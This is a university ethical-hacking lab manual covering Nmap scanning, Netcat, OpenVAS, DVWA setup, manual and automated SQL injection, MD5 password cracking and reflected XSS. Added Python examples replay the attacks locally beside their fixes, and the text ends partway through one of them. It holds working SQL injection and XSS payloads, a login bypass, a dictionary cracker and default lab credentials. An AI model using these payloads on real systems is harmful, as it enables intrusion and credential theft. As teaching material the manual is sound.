Government Engineering College, Rajkot
LAB MANUAL
INDEX
1. Basic commands of Windows and Kali Linux
2. TCP scanning using Nmap
3. Port scanning using Nmap
4. TCP / UDP connectivity using Netcat
5. Network vulnerability using OpenVAS
6. Web application testing using DVWA
7. Manual SQL injection using DVWA
8. XSS
9. Automated SQL injection with SqlMap
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Experiment 1
AIM: BASIC COMMANDS OF WINDOWS AND KALI LINUX
0.1 Basic Commands in Windows
1. ipconfig
Internet protocol configuration (ipconfig) in Microsoft Windows is a console application that displays all current TCP/IP network configuration values and can refresh Dynamic Host Configuration Protocol (DHCP) leases and flush the Domain Name System (DNS) resolver cache (ipconfig /release, /renew, /flushdns).
2. ping
Ping is used to determine whether a connection exists between your computer and another computer reachable via TCP/IP. It sends small packets (ICMP echo requests) to the other computer, which are echoed back if the connection works and lost otherwise. Ping is a useful utility for narrowing down network problems, but some hosts and firewalls drop ICMP, so no reply does not always mean the host is down.
3. tracert
The tracert command is similar to ping but lists every hop (router) a packet passes through on its way to the destination, together with the round-trip time to each hop. It shows exactly how far a packet gets before it fails, which tells you whether a connection problem is close to you or nearer the destination.
4. dir
Displays a list of files and subdirectories in a directory.
5. cd
Changes the current directory
6. copy
Copies one or more files to another location.
7. del (also erase)
Deletes one or more files.
8. xcopy
Copies files and directory trees, including subdirectories.
9. move
Moves files and renames files and directories.
10. mkdir
Creates a directory.
11. rmdir
Removes (deletes) a directory.
12. msinfo32
This command shows a summary of the whole system, including details of Hardware Resources, Components and the Software Environment.
13. dxdiag
DxDiag ("DirectX Diagnostics") is a diagnostics tool used to test DirectX functionality and troubleshoot video- or sound-related hardware problems. It can save the scan results to a text file. These files are often posted in tech forums or attached to support emails to give support personnel a better idea of the requester's PC, in case the error is due to a hardware failure or incompatibility.
14. wmic os get osarchitecture
Queries Windows Management Instrumentation and prints whether the installed OS is 32-bit or 64-bit. It is commonly used inside batch files to decide which version of an executable to run.
16. gpresult /r
The Group Policy Results (GPResult.exe) command-line tool displays the Resultant Set of Policy: all policy settings in effect for a specific user or computer.
17. systeminfo
Displays detailed configuration information about a computer and its
operating system, including operating system configuration, security information,
product ID, and hardware properties, such as RAM, disk space, and network cards.
18. net statistics
Displays the statistics log for the local Workstation or Server service, or the
running services for which statistics are available. Used without parameters, net
statistics lists the running services for which statistics are available.
0.2 Commands in Kali Linux
1. id
Displays the real and effective user ID, group ID and group memberships of the current user (i.e. who is executing the commands).
2. uname -a
Displays the kernel name, hostname, kernel release, kernel version, machine
name, processor (if known), hardware (if known) and operating system.
3. lsb_release -a
Displays the distribution release information, i.e. which version of Kali Linux is installed.
4. ifconfig
Displays information about the network interfaces (e.g. IP address, subnet mask, MAC address).
Note: ifconfig -a displays information about ALL interfaces, including the ones that are currently down.
0.2.2 Networking
1. route -n
Displays the routing table (gateways information).
2. cat /etc/resolv.conf
Displays the DNS information.
3. cat /etc/network/interfaces
Displays the network interface configuration.
4. cat /etc/hosts
Displays the static hostname-to-IP mappings, which are consulted before DNS.
Note: editing these values will NOT change your hostname (for that, look into hostname and /etc/hostname).
0.2.3 Hardware
1. lspci
List all PCI devices (e.g. Internal devices).
2. lsusb
List all USB devices (e.g. External devices).
3. dmesg
Displays the contents of the kernel ring buffer (what is in the kernel log).
Note: this may produce a very large output; pipe it through less or grep.
4. lsmod
Displays the status of modules in the Linux Kernel (e.g. what drivers
have been loaded).
0.2.4 Wi-Fi
1. airmon-zc --verbose
A rewritten version of airmon-ng that helps with troubleshooting and with putting cards into monitor mode.
2. rfkill
Lists, blocks and unblocks (disables and enables) wireless devices.
3. iwconfig
Displays and configures 802.11 (wireless) network interfaces.
4. airmon-ng
Automates turning wireless cards into monitor mode.
Experiment 2
AIM: TCP SCANNING USING NMAP
1.1 Why do we require nmap?
Hacking
These are people who work both offensively and defensively at different times. We cannot foresee their conduct: sometimes they use their skills for the benefit of all, and at other times for personal gain.
Ethical Hacking
Ethical hacking and ethical hacker are terms used to describe hacking
performed by a company or individual to help identify potential threats
on a computer or network.
For an attack over the network, the victim's PC must be on the same network, or some interconnecting network infrastructure must exist between it and the attacker. This means that a PC with no network connection at all (standalone) is safe from network-based attacks. Unauthorised hacking is unlawful under the cyber laws of every country, so never attempt to become a black-hat hacker, but at least know the techniques so that you can defend yourself.
1. Reconnaissance
2. Scanning & Enumeration
3. Gaining access
4. Maintaining access
5. Clearing tracks (Covering Tracks)
1) Reconnaissance
3) Gaining Access
4) Maintaining access
5) Clearing tracks
To avoid being traced and caught, the hacker clears all tracks by deleting every kind of log, removing the uploaded backdoor and anything else that might later reveal their presence. Examples of activities during this phase of the attack include steganography, the use of tunnelling protocols, and altering log files.
Ethical hacking tools
Many tools have been developed for ethical hackers to evaluate security levels. Here we describe some of the widely used tools in ethical hacking.
• Tools:
• SamSpade
• Nmap
• Nessus
• Metasploit
• NetStumbler
SamSpade
• Zone Transfer – ask a DNS server for all it knows about a domain.
• SMTP Relay Check – check whether a mail server allows third party
relaying.
• Scan Addresses – scan a range of IP addresses looking for open ports.
• Crawl website – search a website, looking for email addresses, offsite
links, etc.
• Browse web – browse the web in a raw http format.
• Check cancels – search your news server for cancel messages.
• Fast and Slow Traceroute – find the route packets take between you
and a remote system.
• S-Lang command – issue a scripting command; useful for debugging
scripts.
• Decode URL – decipher an obfuscated URL.
• Parse email headers – read email headers and make a guess about the
origin of the email.
Nmap
Nmap is the most widely used tool in the second phase of ethical hacking, port scanning. It was originally a command-line tool developed only for Unix/Linux based operating systems, but a Windows version is now available and easy to use. It is used for operating system fingerprinting too.
For a quick and simple scan use:
• $ nmap 192.168.1.1
To scan a whole network, give the subnet or a wildcard:
• $ nmap 192.168.1.1/24 or $ nmap 192.168.1.*
Use -O for operating system detection:
• $ nmap -O 192.168.1.1
Nmap Interesting options
• -f fragments packets (to slip past simple packet filters)
• -D launches decoy scans for concealment
• -I IDENT scan, finds the owners of processes on Unix systems (obsolete; no longer present in current Nmap releases)
• -b FTP bounce scan (scans through a vulnerable FTP server's PORT command)
Port Scan Types
• TCP Connect scan
• TCP SYN scan
• TCP FIN scan
• TCP Xmas Tree scan (FIN, URG, and PUSH)
• TCP Null scan
• TCP ACK scan
• UDP scan
Nessus
Nessus is a vulnerability scanner. It checks for:
• Misconfigured or unpatched services.
• Default passwords, common passwords and weak passwords in general.
• Known vulnerabilities present on the system.
MetaSploit
Metasploit is one of the best-known tools for penetration testing. It contains a database of available exploits and is easy to use. The Metasploit Framework is a sub-project of Metasploit and is used to execute exploit code against a target machine and carry out the desired task.
NetStumbler
1.2 TCP Scanning using Nmap
Commands
nmap -sP 192.168.1.*
-sP: ping scan; host discovery only, no port scan (called -sn in current Nmap releases)
nmap -T4 192.168.1.0/24
-T4: aggressive timing template; a faster scan of the /24 using the default port list
nmap -sT 192.168.1.*
-sT: TCP connect scan; completes the three-way handshake on every probed port, so it needs no root privileges but is logged by the target
nmap -sU 192.168.1.*
-sU: UDP scan; ports that never answer are reported as open|filtered, so this scan is slow and less conclusive than a TCP scan
Experiment 3
AIM: PORT SCANNING USING NMAP
2.1 Commands
nmap -sS -P0 -sV -O 192.168.1.0-255
-sS: TCP SYN (half-open) scan; sends a SYN and never completes the handshake (needs root for raw sockets)
-P0: skip host discovery and treat every address as up (written -Pn in current Nmap releases)
-sV: service/version detection of the software listening on each open port
-O: operating system detection
nmap -sT -p80 192.168.1.*
-sT: TCP connect scan
-p80: scan only port 80
nmap -O 192.168.1.0
-O: operating system detection (192.168.1.0 is treated as a single host here; use /24 to cover the whole subnet)
nmap -sF 192.168.1.0
-sF: FIN scan. A bare FIN is sent to each port; closed ports answer with RST, while open or filtered ports stay silent, so Nmap reports them as open|filtered. It works against RFC 793-compliant stacks but not Windows, which answers every port with RST.
nmap -sS 192.168.1.0/24 -D 192.168.1.44
-D: decoy scan. The SYN probes appear to come from the decoy address 192.168.1.44 as well as from the real scanner, so the target's logs show several apparent sources. The real address is still among them, so decoys obscure the scanner rather than hide it.
Experiment 4
AIM: TCP / UDP CONNECTIVITY USING NETCAT
3.1 Basic Information
What is TCP?
• Transmission Control Protocol is a core protocol of the Internet Protocol Suite, commonly referred to as TCP/IP. TCP provides a reliable, ordered, error-checked, connection-oriented delivery service.
What is UDP?
• User Datagram Protocol. Applications that do not require reliable delivery can use UDP. It provides a connectionless service with no ordering or retransmission.
What is Netcat?
• Netcat is a networking utility that reads and writes data across network connections using either Transmission Control Protocol (TCP) or User Datagram Protocol (UDP). It is used for:
• Port scanning
• File transfer
• Banner grabbing
• Port listening and redirection
• Netcat installation in Linux:
• Most Linux distributions come with Netcat installed
• Check with: nc -h or netcat -h
• If it is not installed, open a terminal and type: apt-get install netcat
• Type nc -h to confirm the installation
3.2 Commands
nc -h
• Shows the Netcat help menu
SSL BANNER GRABBING
HTTP BANNER GRABBING
CONNECTING TO THE SERVER
2) Connecting to the server using its IP address and port 12348
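The connect scan of Experiment 3 (nmap -sT) and the banner grabbing of this experiment (nc host port) reduce to the same two socket operations: complete a TCP handshake, then read whatever the service volunteers. The Python script below is an added example, not part of the manual or of Nmap or Netcat, that does both against a listener it starts itself on 127.0.0.1, so it runs offline. The listener, its SSH-style banner and the choice of ports are constructed for the demo; the open/closed/filtered labels follow how Nmap interprets a completed handshake, an RST, or silence.

```python
"""TCP connect scan and banner grab against an in-process test listener.

Added example (not from the lab manual): a Python stand-in for
`nmap -sT -p<ports>` and `nc <host> <port>`. The listener, its banner and
the ports are constructed here so the script runs offline.
"""
import socket
import threading


def start_banner_server(banner: bytes) -> int:
    """Start a TCP listener on 127.0.0.1 that sends `banner` to every client.

    Returns the ephemeral port the OS assigned. Constructed for the demo; it
    stands in for a real service such as sshd, which also speaks first.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Full TCP connect scan (the -sT technique): the three-way handshake is
    completed, so the attempt shows up in the target's connection logs.
    Returns {port: 'open' | 'closed' | 'filtered'}."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                results[port] = "open"        # SYN/ACK came back
            except ConnectionRefusedError:
                results[port] = "closed"      # RST came back
            except (socket.timeout, OSError):
                results[port] = "filtered"    # no answer: dropped by a filter
    return results


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Connect and read what the service sends before we send anything,
    as `nc host port` shows for SSH, SMTP or FTP."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""
    return data.decode("ascii", errors="replace").strip()


def free_closed_port() -> int:
    """Reserve and release an ephemeral port so we have one known to be closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> dict:
    """Scan one open and one closed port on localhost; grab the open port's banner."""
    open_port = start_banner_server(b"SSH-2.0-OpenSSH_9.6 lab-demo\r\n")  # constructed banner
    closed_port = free_closed_port()
    scan = connect_scan("127.0.0.1", [open_port, closed_port])
    return {
        "open_port": open_port,
        "closed_port": closed_port,
        "scan": scan,
        "banner": grab_banner("127.0.0.1", open_port),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The three outcomes in connect_scan are the whole story behind Nmap's port states for a connect scan: an answer of SYN/ACK means open, an RST means closed, and silence until the timeout means something in between is dropping the probe. Because the handshake is completed, the target's service logs the connection, which is why Experiment 3 prefers -sS when stealth matters.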
Experiment 5
AIM: NETWORK VULNERABILITY USING OPENVAS
4.1 Basic Information
What is OpenVAS?
• OpenVAS is a full-featured open source vulnerability scanner and manager.
• It is a combination of several services and tools offering a comprehensive vulnerability scanning and vulnerability management solution.
• It collects and manages security information for networks, devices and systems.
• It uses a client-server architecture: the manager keeps track of all vulnerability results, and the scanner collects the information.
• It is included in Kali Linux (the package has since been renamed Greenbone Vulnerability Management, gvm).
b) Applications -> Kali Linux -> Vulnerability Tools -> OpenVAS -> OpenVAS initial setup
Step 2: Connecting to the OpenVAS Web Interface
a) Open your browser
b) Type https://127.0.0.1:9392
c) Click on "I understand the risks"
d) Confirm the security exception (the warning appears because the web interface uses a self-signed certificate; accepting it for 127.0.0.1 in the lab is expected)
Step 3: OpenVAS Login Box
Step 4: Login
a) The username and password will be one of the following lab accounts:
User name: admin & password: admin
User name: chintan & password: chintan
User name: admin & password: chintan
User name: student & password: student
Step 5: OpenVAS Security Assistant screen
b) Administration -> SCAP Database Feed -> Synchronize with Feed Now
Step 7: Add users (if required)
a) Administration -> Users
• Here you can add a user, delete a user or change a user's access
Step 8: Select Targets to Scan
a) Configuration -> Targets
c) Click on Create Target Button
Step 12: Create a Task
a) Scan Management -> New Task
c) Click on Create Task Button
Experiment 6
AIM: WEB APPLICATION TESTING USING DVWA
5.1 Basic Information
What is Damn Vulnerable Web App (DVWA)?
• It is a PHP/MySQL web application that is deliberately ("damn") vulnerable.
• The main goal of DVWA is to be an aid for security professionals to test their skills and tools in a legal environment.
• It helps web developers to better understand the process of securing a web application, and lets teachers and students teach and learn web application security in a classroom environment.
Important Note: DVWA should be installed on the attacker's own device (an isolated lab machine) and never exposed to the Internet.
Step 2: Unzip the downloaded file with the command "unzip filename".
Step 3: Copy dvwa folder into Computer → File system → var → www.
Step 4: Set the permissions of DVWA to 777. Open a terminal, type "chmod 777 /var/www/dvwa" and press Enter. (777 gives every local account read and write access to the folder; do this only on a throwaway lab VM.)
Step 5: a) Run Apache: go to Applications → Kali Linux → System Services → HTTP → apache2 start.
b) Apache runs successfully.
Step 6: a) Run MySQL: go to Applications → Kali Linux → System Services → MySQL → mysql start.
b) MySQL runs successfully.
Step 7: Create the database for DVWA
a) Open a terminal.
b) Type mysql -u root -p and press Enter.
c) When it asks for a password, just press Enter (the default root password is empty).
d) Now type create database dvwa; and press Enter.
e) To leave the MySQL shell, type exit and press Enter.
Step 8: Go to your browser and write http://127.0.0.1/dvwa or http://localhost/dvwa
Step 10: If you get the error "Table 'dvwa.users' doesn't exist":
Go to http://127.0.0.1/dvwa/setup.php
Then click on Create/Reset Database.
Step 11: Go to http://127.0.0.1/dvwa/login.php
Step 12: Log in with the default credentials: username = admin and password = password.
Experiment 7
AIM: MANUAL SQL INJECTION USING DVWA
6.1 Basic Information
What is SQL injection?
• SQL injection (SQLi) is a technique used to attack data-driven applications.
• Rogue SQL statements are entered into an input field (a login box, a search field, a URL parameter) so that they are passed to the database and executed as part of the application's own query.
• It exploits a security vulnerability in the application software: building the query by concatenating untrusted input instead of using bound parameters.
• SQL injection is mostly known as an attack vector for websites, but it can be used against any application that builds SQL queries from untrusted input, whatever the database.
Important Note: DVWA should be installed on the attacker's own device (an isolated lab machine) and never exposed to the Internet.
Step 3: Open your browser
Step 4: Type the following URL in your browser:
http://172.21.30.133/dvwa/login.php
Note: the IP address used here is that of the victim (DVWA host) machine.
b) Password: password
c) Click on Login
Step 7: Click on SQL Injection in Left hand side menu.
a) Type 1 in the text box.
b) Click on Submit Button.
Step 8: Make the WHERE clause always true, so that every record is returned:
a) Type %' or '0'='0 in the text box.
b) Click on Submit Button.
Step 9: To find the version of the database:
a) Type %' or 0=0 union select null, version() # in the text box.
b) Click on Submit Button.
Step 10: To display the name of the current database:
a) Type %' or 0=0 union select null, database() # in the text box.
b) Click on Submit Button.
Step 11: To list every table known to information_schema:
a) Type %' and 1=0 union select null, table_name from information_schema.tables # in the text box.
b) Click on Submit Button.
Note: information_schema is the metadata database that stores information about all the other databases the MySQL server maintains. The 1=0 suppresses the original rows so only the injected results are shown.
Step 12: To list only the tables whose names start with "user":
a) Type %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# in the text box.
b) Click on Submit Button.
Step 13: To display all the columns of the users table, as recorded in information_schema:
a) Type %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # in the text box.
b) Click on Submit Button.
Note: 0x0a is a newline, so each table and column name appears on its own line. The columns will be user_id, first_name, last_name, user and password.
Step 14: To dump the contents of the users table in the dvwa database:
a) Type %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # in the text box.
b) Click on Submit Button.
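To see what the payloads of Steps 8 to 14 do to the query, the Python script below (an added example; not from the manual or from DVWA) rebuilds DVWA's low-security lookup, SELECT first_name, last_name FROM users WHERE user_id = '$id', over an in-memory SQLite database with constructed sample users. SQLite has no information_schema and does not treat # as a comment, so the payloads use the equivalents sqlite_master and '-- ' (the comment still swallows the application's trailing quote). The parameterised version of the same query sits beside the vulnerable one to show the fix.

```python
"""DVWA low-security SQL injection replayed on SQLite, vulnerable beside fixed.

Added example, not from the lab manual or DVWA. The sample users are
constructed; the password column holds unsalted MD5, as DVWA stores it.
"""
import hashlib
import sqlite3

# Constructed users in DVWA's column layout: user_id, first_name, last_name, user, password.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "password"),
    (2, "Gordon", "Brown", "gordonb", "abc123"),
    (3, "Pablo", "Picasso", "pablo", "letmein"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(uid, fn, ln, user, hashlib.md5(pw.encode()).hexdigest())
         for uid, fn, ln, user, pw in SAMPLE_USERS],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA 'low': the input is spliced into the SQL text, so a quote in the
    payload closes the literal and everything after it is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """The fix: a bound parameter. The input is only ever a value, never SQL."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


# The manual's payloads; SQLite's '-- ' stands in for MySQL's '#'.
ALL_ROWS = "%' or '0'='0"                                                 # Step 8
TABLES = ("%' and 1=0 union select null, name from sqlite_master "
          "where type='table' -- ")                                       # Step 11 (sqlite_master instead of information_schema.tables)
DUMP = "%' and 1=0 union select user, password from users -- "           # Step 14


def demo():
    """Run each payload through the vulnerable lookup, and one through the fixed lookup."""
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "1"),
        "all_rows": lookup_vulnerable(conn, ALL_ROWS),
        "tables": lookup_vulnerable(conn, TABLES),
        "dump": dict(lookup_vulnerable(conn, DUMP)),   # user -> md5(password)
        "safe_all_rows": lookup_safe(conn, ALL_ROWS),  # same payload, no effect
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The UNION payloads work only because the injected SELECT returns the same number of columns as the original (two), which is why the manual pads with null; Experiment 9 turns finding that count into a procedure. With the bound parameter the whole payload is compared against user_id as one value and matches nothing.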
Step 15: Now create a file whose content will be the usernames and hashed passwords.
a) To save the file, open a terminal and create a folder: mkdir /root/Desktop/password
b) Copy all usernames and hashed passwords from the DVWA output.
c) Paste the data into a text editor (Applications --> Accessories --> gedit) and save it as password.txt in that folder, one hash per line, optionally prefixed with the username and a colon (user:hash).
Step 17: Run John the Ripper on password.txt to recover the original passwords of the respective users:
a) Change to the folder where password.txt is saved (i.e. cd Desktop/password and press Enter).
(As my folder is named Jay and sits directly under root, I did cd Jay.)
b) Now type /usr/sbin/john --format=raw-MD5 password.txt
c) Press Enter. Cracked passwords are printed as they are found and can be listed again later with john --show --format=raw-MD5 password.txt.
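Step 17 succeeds in seconds because DVWA stores unsalted MD5: one digest per candidate word can be compared against every user at once. The Python below is an added example, not the manual's or John the Ripper's code, that performs the same dictionary attack. The password.txt content (in john's user:hash layout) and the six-word wordlist are constructed for the demo; the smithy line is a made-up hash that no word matches, to show an uncracked entry.

```python
"""Dictionary attack on unsalted MD5, what john --format=raw-MD5 does to password.txt.

Added example, not from the lab manual or John the Ripper. The password file
content and the wordlist are constructed for the demo.
"""
import hashlib

# Constructed password.txt in john's  user:hash  layout. The last line is a
# made-up hash that matches no word, to show an uncracked entry.
PASSWORD_TXT = """\
admin:5f4dcc3b5aa765d61d8327deb882cf99
gordonb:e99a18c428cb38d5f260853678922e03
pablo:0d107d09f5bbe40cade3de5c71e9e9b7
smithy:0123456789abcdef0123456789abcdef
"""

# Constructed six-word list standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "abc123", "letmein", "monkey"]


def parse_password_file(text):
    """Return {user: hex_digest} from 'user:hash' lines; a bare hash gets a
    generated label, much as john numbers unnamed entries."""
    entries = {}
    for number, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.rpartition(":")
        entries[user or f"hash{number}"] = digest.lower()
    return entries


def crack_raw_md5(entries, wordlist):
    """Hash each candidate word once and look it up against every target.

    This is cheap precisely because the hashes are unsalted: one digest
    serves all users, and MD5 costs microseconds per guess."""
    targets = {}
    for user, digest in entries.items():
        targets.setdefault(digest, []).append(user)
    cracked = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in targets.get(digest, ()):
            cracked[user] = word
    return cracked


def demo():
    """Crack the constructed file; returns {user: plaintext} for the hits only."""
    return crack_raw_md5(parse_password_file(PASSWORD_TXT), WORDLIST)


if __name__ == "__main__":
    for user, plaintext in demo().items():
        print(f"{user}: {plaintext}")
```

The defensive lesson is the inverse of the loop above: a per-user salt forces one digest per user per guess, and a deliberately slow hash such as bcrypt or Argon2 makes each of those guesses expensive, so the same wordlist no longer finishes in a blink.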
Experiment 8
AIM: XSS
7.1 Basic Information
This practical is performed in the web application of Virtual Amrita Laboratories Universalizing Education.
What is Cross Site Scripting (XSS)?
• Cross Site Scripting (XSS) is a type of security vulnerability found mainly in web applications.
• It enables attackers to inject client-side script into web pages that are viewed by other users.
• Input a user sends, such as their username, password and session ID, can later be captured by the injected script.
• The victim's browser has no way to know that the script is not to be trusted. It believes the script comes from a trusted source and executes it. A malicious script can therefore access any cookies, session tokens, or other information retrieved through that browser and used with that site.
Current scenario
• Mr. John is a web developer who creates Twitter-like web applications. You came across a website he built and want to show him that his site is vulnerable to XSS.
Details:
• Reflected XSS occurs when user-supplied values are not properly sanitised before being output. Here, go to the link provided and try to post a tweet. You can see that the result is echoed back. Now what if we try to inject something (say JavaScript) into the tweet box? If the input is not properly validated, the injected script runs in the context of the site. Let us see how it works:
I am tweet <Script> alert("XSS");</script>
You can see that we get a pop-up printing the word "XSS", which means that the injected JavaScript ran in the context of the site, and the site is vulnerable to XSS.
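The tweet page above reflects input into HTML unchanged. The Python below is an added example, not part of the manual or the Amrita lab application, that shows the vulnerable rendering beside the escaped one for two output contexts: between tags, where the manual's script payload fires, and inside a quoted attribute, where a payload that merely closes the quote and adds an event handler fires instead. The two templates and the attribute payload are constructed for the demo.

```python
"""Reflected XSS: the tweet echoed raw versus HTML-escaped, in two contexts.

Added example, not from the lab manual or the Amrita lab application.
Templates and the attribute payload are constructed for the demo.
"""
import html

# Constructed templates standing in for the lab's tweet page.
TEXT_TEMPLATE = "<p>Your tweet: {tweet}</p>"
ATTR_TEMPLATE = '<input name="tweet" value="{tweet}">'

# The manual's payload, and an attribute-context payload that needs no '<' at all.
SCRIPT_PAYLOAD = 'I am tweet <Script> alert("XSS");</script>'
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def render_text_vulnerable(tweet):
    """Input pasted between tags unchanged: the browser parses <script> as markup."""
    return TEXT_TEMPLATE.format(tweet=tweet)


def render_text_safe(tweet):
    """Escape &, <, > and quotes so the same bytes are displayed as text."""
    return TEXT_TEMPLATE.format(tweet=html.escape(tweet, quote=True))


def render_attr_vulnerable(tweet):
    """Input pasted into a quoted attribute: a stray '"' ends the value and
    whatever follows becomes new attributes, including event handlers."""
    return ATTR_TEMPLATE.format(tweet=tweet)


def render_attr_safe(tweet):
    """quote=True turns '"' into &quot;, so the attribute cannot be closed early."""
    return ATTR_TEMPLATE.format(tweet=html.escape(tweet, quote=True))


def has_script_element(page):
    """Crude demo check: a script start tag, matched case-insensitively as browsers do."""
    return "<script" in page.lower()


def has_event_handler(page):
    """Crude demo check: an onfocus attribute that is live markup, i.e. preceded by a real quote."""
    return '" onfocus=' in page
```

The check in render_attr_safe matters as much as the one in render_text_safe: html.escape without quote=True would stop the script payload but leave the attribute payload intact, because that payload never uses < or >. Escaping has to match the context the value lands in; for a value placed inside a JavaScript string or a URL, HTML escaping alone is not sufficient.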
7.2 Practical
Experiment 9
AIM: SQL INJECTION WITH SQLMAP
8.1 Basic Information
What is SqlMap?
• SqlMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Current Scenario
• Mr. Arun has created an awesome online shopping cart application, but he forgot to do a security audit of it and left it vulnerable to many security issues. In this experiment you will identify the spots, or entry points, that are vulnerable to SQL injection.
• Find the search box, try entering a ' (single quote) in it and observe the output you get.
Details:
When you enter a ' (single quote) into the text box, the search query the application executes in the backend is modified. The modified query may no longer be syntactically correct, so the database management system throws an error back. Error messages are valuable tips to the attacker and can be used to construct the injection input needed to get at data the attacker is not authorised to access.
8.2 Practical
Fuzzing
Here you learn how to fuzz web applications, basically to find out whether a particular web application is vulnerable or not. Fuzzing is a technique in which you try various malformed or malicious inputs and observe the behaviour of the application. In this experiment you practise a simple fuzzing technique that makes the underlying database throw an error.
• You can see an online shopping cart application on the left of your screen; enter a ' (single quote) in the search box and observe the output.
• The online shopping cart application uses a MySQL database as its backend to store data, and to access this data its underlying code executes SQL queries. If the developers do not sanitise user input properly, for example if the application does not check the values entered into the search field, the attacker is able to modify the backend query. When you enter a ', the backend query gets modified: the extra quote makes the syntax of the backend query incorrect, so MySQL throws an error.
Step 5: You will see a shopping cart web application.
Step 6: Write a ' in the textbox, click Search and observe the output.
Step 7: Select the output shown under Backend SQL Query, paste it into the textbox, click Search and observe the output.
Step 8: This process continues and gives hints for writing your query.
Step 9: Choose page 4 and follow the instructions below.
• If yes, then try the following inputs and observe whether you are able to log in as administrator.
b) Modified Query: select username from login where username='admin' and 1=1# and password='password'
Step 11: Explanation of the above queries
In the original SQL query, if the username and password entered are authentic the query returns the username; otherwise it returns nothing, which shows that the username and password do not match or do not exist. In the modified query the # starts a MySQL comment, so everything after it, including the password check, is ignored; the condition 1=1 is always true, so the query reduces to username='admin' and returns the admin row. Conditions can also be combined with an OR operator: if either side is true the whole expression is true (for example ' or 1=1#). Either way this lets us log in as administrator without a valid password.
Step 12: Choose page 5 and follow the instruction given bellow:
Step 14: Analysing the original query
a) We have just entered django and it shows the output, but the original query should be:
b) Original Query: select product_name, price from product where name='django'
Step 15: Now you have to concatenate a SQL query with the existing user
input and let us see how the SQL query gets transformed.
a) Type input as django' union all select 1, 2# in textbox
b) Click on Submit button
c) Observe the output.
Step 16: Analysing the modified query.
The query executed is now "select product_name, price from product where name='django' union all select 1,2#'" (the # comments out the application's own trailing quote). So, if you are able to see the product_name and price of the product django together with a row showing 1 and 2, the above query was valid. The union operator lets you concatenate two SQL queries and execute them as one, but the query is valid only if the number of columns selected on the left-hand side and on the right-hand side of the union are equal. In the above query there are two columns on the left-hand side, product_name and price, and correspondingly we selected two values on the right-hand side, 1 and 2. Usually when we are doing injection the left-hand (original) query is not visible, so we have to find the column count by trial and error with dummy values (or NULL), adding one column at a time until the error disappears. Once we know the number of columns, we can build the injection query accordingly. The next experiment demonstrates how to dump MySQL metadata from the information_schema database.
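The trial and error of Steps 15 and 16 is exactly what sqlmap automates. The Python below is an added example, not from the manual or from sqlmap: shop_search_vulnerable is a constructed stand-in for the lab's search page (SELECT product_name, price FROM product WHERE name='<input>' on SQLite, over constructed product and login rows), login_vulnerable stands in for the Step 10 login form, and the functions around them do what the steps do by hand: provoke the error with a lone quote, grow the UNION one NULL at a time until the column counts match, then pad with NULLs and pull the login table as in Step 23. SQLite's '-- ' replaces MySQL's # comment.

```python
"""Automating the shop-cart SQL injection: error probe, UNION column count,
padded dump and login bypass.

Added example, not from the lab manual or sqlmap. The search and login
functions are constructed stand-ins for the lab pages; the rows are made up.
"""
import sqlite3

SCHEMA = """
CREATE TABLE product (name TEXT, product_name TEXT, price INTEGER);
CREATE TABLE login (username TEXT, password TEXT);
INSERT INTO product VALUES ('django', 'Django Unchained (DVD)', 12),
                           ('matrix', 'The Matrix (DVD)', 9);
INSERT INTO login VALUES ('admin', 'Sup3rS3cret'), ('arun', 'letmein');
"""
CONN = sqlite3.connect(":memory:")
CONN.executescript(SCHEMA)


def shop_search_vulnerable(term):
    """The lab's search page: input spliced into the SQL text.
    Returns (rows, None) or (None, error_message), because the page leaks
    the DBMS error back to the user."""
    query = f"SELECT product_name, price FROM product WHERE name='{term}'"
    try:
        return CONN.execute(query).fetchall(), None
    except sqlite3.Error as exc:
        return None, str(exc)


def login_vulnerable(username, password):
    """The lab's login form; returns the matched usernames."""
    query = (f"SELECT username FROM login WHERE username='{username}' "
             f"AND password='{password}'")
    return CONN.execute(query).fetchall()


def is_injectable(search):
    """Step 6: a lone quote unbalances the quoting and the DBMS complains."""
    _, error = search("'")
    return error is not None


def find_column_count(search, max_cols=10):
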